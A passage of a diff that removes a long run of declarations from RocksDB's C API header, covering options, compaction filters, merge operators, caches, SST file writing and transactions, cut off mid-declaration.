-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_level0_stop_writes_trigger(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_mem_compaction_level(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_target_file_size_base(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_target_file_size_multiplier(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_bytes_for_level_base(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_level_compaction_dynamic_level_bytes(rocksdb_options_t*,
-                                                         unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_bytes_for_level_multiplier(rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_bytes_for_level_multiplier_additional(
-    rocksdb_options_t*, int* level_values, size_t num_levels);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_enable_statistics(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_skip_stats_update_on_db_open(
-    rocksdb_options_t* opt, unsigned char val);
-
-/* returns a pointer to a malloc()-ed, null terminated string */
-extern ROCKSDB_LIBRARY_API char* rocksdb_options_statistics_get_string(
-    rocksdb_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_write_buffer_number(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_min_write_buffer_number_to_merge(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_write_buffer_number_to_maintain(rocksdb_options_t*,
-                                                        int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_background_compactions(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_base_background_compactions(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_background_flushes(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_log_file_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_log_file_time_to_roll(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_keep_log_file_num(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_recycle_log_file_num(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_soft_rate_limit(
-    rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hard_rate_limit(
-    rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_soft_pending_compaction_bytes_limit(
-    rocksdb_options_t* opt, size_t v);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hard_pending_compaction_bytes_limit(
-    rocksdb_options_t* opt, size_t v);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_rate_limit_delay_max_milliseconds(rocksdb_options_t*,
-                                                      unsigned int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_manifest_file_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_table_cache_numshardbits(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_table_cache_remove_scan_count_limit(rocksdb_options_t*,
-                                                        int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_arena_block_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_use_fsync(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_log_dir(
-    rocksdb_options_t*, const char*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_wal_dir(rocksdb_options_t*,
-                                                            const char*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_WAL_ttl_seconds(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_WAL_size_limit_MB(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_manifest_preallocation_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t*,
-                                                    unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_allow_mmap_reads(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_allow_mmap_writes(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_use_direct_reads(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_use_direct_io_for_flush_and_compaction(rocksdb_options_t*,
-                                                           unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_is_fd_close_on_exec(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_skip_log_error_on_recovery(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_stats_dump_period_sec(
-    rocksdb_options_t*, unsigned int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_advise_random_on_open(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_access_hint_on_compaction_start(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_use_adaptive_mutex(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_bytes_per_sync(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_allow_concurrent_memtable_write(rocksdb_options_t*,
-                                                    unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_enable_write_thread_adaptive_yield(rocksdb_options_t*,
-                                                       unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_sequential_skip_in_iterations(rocksdb_options_t*,
-                                                      uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_disable_auto_compactions(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_optimize_filters_for_hits(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_delete_obsolete_files_period_micros(rocksdb_options_t*,
-                                                        uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_prepare_for_bulk_load(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_memtable_vector_rep(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_memtable_prefix_bloom_size_ratio(
-    rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_compaction_bytes(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hash_skip_list_rep(
-    rocksdb_options_t*, size_t, int32_t, int32_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hash_link_list_rep(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_plain_table_factory(
-    rocksdb_options_t*, uint32_t, int, double, size_t);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_min_level_to_compress(
-    rocksdb_options_t* opt, int level);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_memtable_huge_page_size(
-    rocksdb_options_t*, size_t);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_successive_merges(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_bloom_locality(
-    rocksdb_options_t*, uint32_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_inplace_update_support(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_inplace_update_num_locks(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_report_bg_io_stats(
-    rocksdb_options_t*, int);
-
-enum {
-  rocksdb_tolerate_corrupted_tail_records_recovery = 0,
-  rocksdb_absolute_consistency_recovery = 1,
-  rocksdb_point_in_time_recovery = 2,
-  rocksdb_skip_any_corrupted_records_recovery = 3
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_wal_recovery_mode(
-    rocksdb_options_t*, int);
-
-enum {
-  rocksdb_no_compression = 0,
-  rocksdb_snappy_compression = 1,
-  rocksdb_zlib_compression = 2,
-  rocksdb_bz2_compression = 3,
-  rocksdb_lz4_compression = 4,
-  rocksdb_lz4hc_compression = 5,
-  rocksdb_xpress_compression = 6,
-  rocksdb_zstd_compression = 7
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compression(
-    rocksdb_options_t*, int);
-
-enum {
-  rocksdb_level_compaction = 0,
-  rocksdb_universal_compaction = 1,
-  rocksdb_fifo_compaction = 2
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compaction_style(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_universal_compaction_options(
-    rocksdb_options_t*, rocksdb_universal_compaction_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_fifo_compaction_options(
-    rocksdb_options_t* opt, rocksdb_fifo_compaction_options_t* fifo);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_ratelimiter(
-    rocksdb_options_t* opt, rocksdb_ratelimiter_t* limiter);
-
-/* RateLimiter */
-extern ROCKSDB_LIBRARY_API rocksdb_ratelimiter_t* rocksdb_ratelimiter_create(
-    int64_t rate_bytes_per_sec, int64_t refill_period_us, int32_t fairness);
-extern ROCKSDB_LIBRARY_API void rocksdb_ratelimiter_destroy(rocksdb_ratelimiter_t*);
-
-/* Compaction Filter */
-
-extern ROCKSDB_LIBRARY_API rocksdb_compactionfilter_t*
-rocksdb_compactionfilter_create(
-    void* state, void (*destructor)(void*),
-    unsigned char (*filter)(void*, int level, const char* key,
-                            size_t key_length, const char* existing_value,
-                            size_t value_length, char** new_value,
-                            size_t* new_value_length,
-                            unsigned char* value_changed),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_compactionfilter_set_ignore_snapshots(
-    rocksdb_compactionfilter_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_compactionfilter_destroy(
-    rocksdb_compactionfilter_t*);
-
-/* Compaction Filter Context */
-
-extern ROCKSDB_LIBRARY_API unsigned char
-rocksdb_compactionfiltercontext_is_full_compaction(
-    rocksdb_compactionfiltercontext_t* context);
-
-extern ROCKSDB_LIBRARY_API unsigned char
-rocksdb_compactionfiltercontext_is_manual_compaction(
-    rocksdb_compactionfiltercontext_t* context);
-
-/* Compaction Filter Factory */
-
-extern ROCKSDB_LIBRARY_API rocksdb_compactionfilterfactory_t*
-rocksdb_compactionfilterfactory_create(
-    void* state, void (*destructor)(void*),
-    rocksdb_compactionfilter_t* (*create_compaction_filter)(
-        void*, rocksdb_compactionfiltercontext_t* context),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_compactionfilterfactory_destroy(
-    rocksdb_compactionfilterfactory_t*);
-
-/* Comparator */
-
-extern ROCKSDB_LIBRARY_API rocksdb_comparator_t* rocksdb_comparator_create(
-    void* state, void (*destructor)(void*),
-    int (*compare)(void*, const char* a, size_t alen, const char* b,
-                   size_t blen),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_comparator_destroy(
-    rocksdb_comparator_t*);
-
-/* Filter policy */
-
-extern ROCKSDB_LIBRARY_API rocksdb_filterpolicy_t* rocksdb_filterpolicy_create(
-    void* state, void (*destructor)(void*),
-    char* (*create_filter)(void*, const char* const* key_array,
-                           const size_t* key_length_array, int num_keys,
-                           size_t* filter_length),
-    unsigned char (*key_may_match)(void*, const char* key, size_t length,
-                                   const char* filter, size_t filter_length),
-    void (*delete_filter)(void*, const char* filter, size_t filter_length),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_filterpolicy_destroy(
-    rocksdb_filterpolicy_t*);
-
-extern ROCKSDB_LIBRARY_API rocksdb_filterpolicy_t*
-rocksdb_filterpolicy_create_bloom(int bits_per_key);
-extern ROCKSDB_LIBRARY_API rocksdb_filterpolicy_t*
-rocksdb_filterpolicy_create_bloom_full(int bits_per_key);
-
-/* Merge Operator */
-
-extern ROCKSDB_LIBRARY_API rocksdb_mergeoperator_t*
-rocksdb_mergeoperator_create(
-    void* state, void (*destructor)(void*),
-    char* (*full_merge)(void*, const char* key, size_t key_length,
-                        const char* existing_value,
-                        size_t existing_value_length,
-                        const char* const* operands_list,
-                        const size_t* operands_list_length, int num_operands,
-                        unsigned char* success, size_t* new_value_length),
-    char* (*partial_merge)(void*, const char* key, size_t key_length,
-                           const char* const* operands_list,
-                           const size_t* operands_list_length, int num_operands,
-                           unsigned char* success, size_t* new_value_length),
-    void (*delete_value)(void*, const char* value, size_t value_length),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_mergeoperator_destroy(
-    rocksdb_mergeoperator_t*);
-
-/* Read options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_readoptions_t* rocksdb_readoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_destroy(
-    rocksdb_readoptions_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_verify_checksums(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_fill_cache(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_snapshot(
-    rocksdb_readoptions_t*, const rocksdb_snapshot_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_iterate_upper_bound(
-    rocksdb_readoptions_t*, const char* key, size_t keylen);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_read_tier(
-    rocksdb_readoptions_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_tailing(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_readahead_size(
-    rocksdb_readoptions_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_pin_data(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_total_order_seek(
-    rocksdb_readoptions_t*, unsigned char);
-
-/* Write options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_writeoptions_t*
-rocksdb_writeoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_writeoptions_destroy(
-    rocksdb_writeoptions_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writeoptions_set_sync(
-    rocksdb_writeoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_writeoptions_disable_WAL(
-    rocksdb_writeoptions_t* opt, int disable);
-
-/* Compact range options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_compactoptions_t*
-rocksdb_compactoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_compactoptions_destroy(
-    rocksdb_compactoptions_t*);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_compactoptions_set_exclusive_manual_compaction(
-    rocksdb_compactoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_compactoptions_set_change_level(
-    rocksdb_compactoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_compactoptions_set_target_level(
-    rocksdb_compactoptions_t*, int);
-
-/* Flush options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_flushoptions_t*
-rocksdb_flushoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_flushoptions_destroy(
-    rocksdb_flushoptions_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_flushoptions_set_wait(
-    rocksdb_flushoptions_t*, unsigned char);
-
-/* Cache */
-
-extern ROCKSDB_LIBRARY_API rocksdb_cache_t* rocksdb_cache_create_lru(
-    size_t capacity);
-extern ROCKSDB_LIBRARY_API void rocksdb_cache_destroy(rocksdb_cache_t* cache);
-extern ROCKSDB_LIBRARY_API void rocksdb_cache_set_capacity(
-    rocksdb_cache_t* cache, size_t capacity);
-extern ROCKSDB_LIBRARY_API size_t
-rocksdb_cache_get_usage(rocksdb_cache_t* cache);
-extern ROCKSDB_LIBRARY_API size_t
-rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache);
-
-/* DBPath */
-
-extern ROCKSDB_LIBRARY_API rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size);
-extern ROCKSDB_LIBRARY_API void rocksdb_dbpath_destroy(rocksdb_dbpath_t*);
-
-/* Env */
-
-extern ROCKSDB_LIBRARY_API rocksdb_env_t* rocksdb_create_default_env();
-extern ROCKSDB_LIBRARY_API rocksdb_env_t* rocksdb_create_mem_env();
-extern ROCKSDB_LIBRARY_API void rocksdb_env_set_background_threads(
-    rocksdb_env_t* env, int n);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_env_set_high_priority_background_threads(rocksdb_env_t* env, int n);
-extern ROCKSDB_LIBRARY_API void rocksdb_env_join_all_threads(
-    rocksdb_env_t* env);
-extern ROCKSDB_LIBRARY_API void rocksdb_env_destroy(rocksdb_env_t*);
-
-extern ROCKSDB_LIBRARY_API rocksdb_envoptions_t* rocksdb_envoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_envoptions_destroy(
-    rocksdb_envoptions_t* opt);
-
-/* SstFile */
-
-extern ROCKSDB_LIBRARY_API rocksdb_sstfilewriter_t*
-rocksdb_sstfilewriter_create(const rocksdb_envoptions_t* env,
-                             const rocksdb_options_t* io_options);
-extern ROCKSDB_LIBRARY_API rocksdb_sstfilewriter_t*
-rocksdb_sstfilewriter_create_with_comparator(
-    const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options,
-    const rocksdb_comparator_t* comparator);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_open(
-    rocksdb_sstfilewriter_t* writer, const char* name, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_add(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    const char* val, size_t vallen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_put(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    const char* val, size_t vallen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_merge(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    const char* val, size_t vallen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_delete(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_finish(
-    rocksdb_sstfilewriter_t* writer, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_destroy(
-    rocksdb_sstfilewriter_t* writer);
-
-extern ROCKSDB_LIBRARY_API rocksdb_ingestexternalfileoptions_t*
-rocksdb_ingestexternalfileoptions_create();
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_move_files(
-    rocksdb_ingestexternalfileoptions_t* opt, unsigned char move_files);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_snapshot_consistency(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char snapshot_consistency);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_allow_global_seqno(
-    rocksdb_ingestexternalfileoptions_t* opt, unsigned char allow_global_seqno);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_allow_blocking_flush(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char allow_blocking_flush);
-extern ROCKSDB_LIBRARY_API void rocksdb_ingestexternalfileoptions_destroy(
-    rocksdb_ingestexternalfileoptions_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_ingest_external_file(
-    rocksdb_t* db, const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_ingest_external_file_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* handle,
-    const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr);
-
-/* SliceTransform */
-
-extern ROCKSDB_LIBRARY_API rocksdb_slicetransform_t*
-rocksdb_slicetransform_create(
-    void* state, void (*destructor)(void*),
-    char* (*transform)(void*, const char* key, size_t length,
-                       size_t* dst_length),
-    unsigned char (*in_domain)(void*, const char* key, size_t length),
-    unsigned char (*in_range)(void*, const char* key, size_t length),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API rocksdb_slicetransform_t*
-    rocksdb_slicetransform_create_fixed_prefix(size_t);
-extern ROCKSDB_LIBRARY_API rocksdb_slicetransform_t*
-rocksdb_slicetransform_create_noop();
-extern ROCKSDB_LIBRARY_API void rocksdb_slicetransform_destroy(
-    rocksdb_slicetransform_t*);
-
-/* Universal Compaction options */
-
-enum {
-  rocksdb_similar_size_compaction_stop_style = 0,
-  rocksdb_total_size_compaction_stop_style = 1
-};
-
-extern ROCKSDB_LIBRARY_API rocksdb_universal_compaction_options_t*
-rocksdb_universal_compaction_options_create();
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_size_ratio(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_min_merge_width(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_max_merge_width(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_max_size_amplification_percent(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_compression_size_percent(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_stop_style(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_universal_compaction_options_destroy(
-    rocksdb_universal_compaction_options_t*);
-
-extern ROCKSDB_LIBRARY_API rocksdb_fifo_compaction_options_t*
-rocksdb_fifo_compaction_options_create();
-extern ROCKSDB_LIBRARY_API void
-rocksdb_fifo_compaction_options_set_max_table_files_size(
-    rocksdb_fifo_compaction_options_t* fifo_opts, uint64_t size);
-extern ROCKSDB_LIBRARY_API void rocksdb_fifo_compaction_options_destroy(
-    rocksdb_fifo_compaction_options_t* fifo_opts);
-
-extern ROCKSDB_LIBRARY_API int rocksdb_livefiles_count(
-    const rocksdb_livefiles_t*);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_livefiles_name(
-    const rocksdb_livefiles_t*, int index);
-extern ROCKSDB_LIBRARY_API int rocksdb_livefiles_level(
-    const rocksdb_livefiles_t*, int index);
-extern ROCKSDB_LIBRARY_API size_t
-rocksdb_livefiles_size(const rocksdb_livefiles_t*, int index);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_livefiles_smallestkey(
-    const rocksdb_livefiles_t*, int index, size_t* size);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_livefiles_largestkey(
-    const rocksdb_livefiles_t*, int index, size_t* size);
-extern ROCKSDB_LIBRARY_API void rocksdb_livefiles_destroy(
-    const rocksdb_livefiles_t*);
-
-/* Utility Helpers */
-
-extern ROCKSDB_LIBRARY_API void rocksdb_get_options_from_string(
-    const rocksdb_options_t* base_options, const char* opts_str,
-    rocksdb_options_t* new_options, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_file_in_range(
-    rocksdb_t* db, const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_file_in_range_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* limit_key,
-    size_t limit_key_len, char** errptr);
-
-/* Transactions */
-
-extern ROCKSDB_LIBRARY_API rocksdb_column_family_handle_t*
-rocksdb_transactiondb_create_column_family(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_options_t* column_family_options,
-    const char* column_family_name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_t* rocksdb_transactiondb_open(
-    const rocksdb_options_t* options,
-    const rocksdb_transactiondb_options_t* txn_db_options, const char* name,
-    char** errptr);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t*
-rocksdb_transactiondb_create_snapshot(rocksdb_transactiondb_t* txn_db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_release_snapshot(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_snapshot_t* snapshot);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transaction_t* rocksdb_transaction_begin(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_transaction_options_t* txn_options,
-    rocksdb_transaction_t* old_txn);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_commit(
-    rocksdb_transaction_t* txn, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_rollback(
-    rocksdb_transaction_t* txn, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_destroy(
-    rocksdb_transaction_t* txn);
-
-// This snapshot should be freed using rocksdb_free
-extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t*
-rocksdb_transaction_get_snapshot(rocksdb_transaction_t* txn);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options,
-    const char* key, size_t klen, size_t* vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_cf(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key, size_t klen,
-    size_t* vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_for_update(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options,
-    const char* key, size_t klen, size_t* vlen, unsigned char exclusive,
-    char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options,
-    const char* key, size_t klen, size_t* vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, size_t* vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put(
-    rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val,
-    size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put_cf(
-    rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    const char* key, size_t klen, const char* val, size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_t *batch, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_merge(
-    rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val,
-    size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_merge(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    const char* key, size_t klen, const char* val, size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete(
-    rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete_cf(
-    rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    const char* key, size_t klen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t*
-rocksdb_transaction_create_iterator(rocksdb_transaction_t* txn,
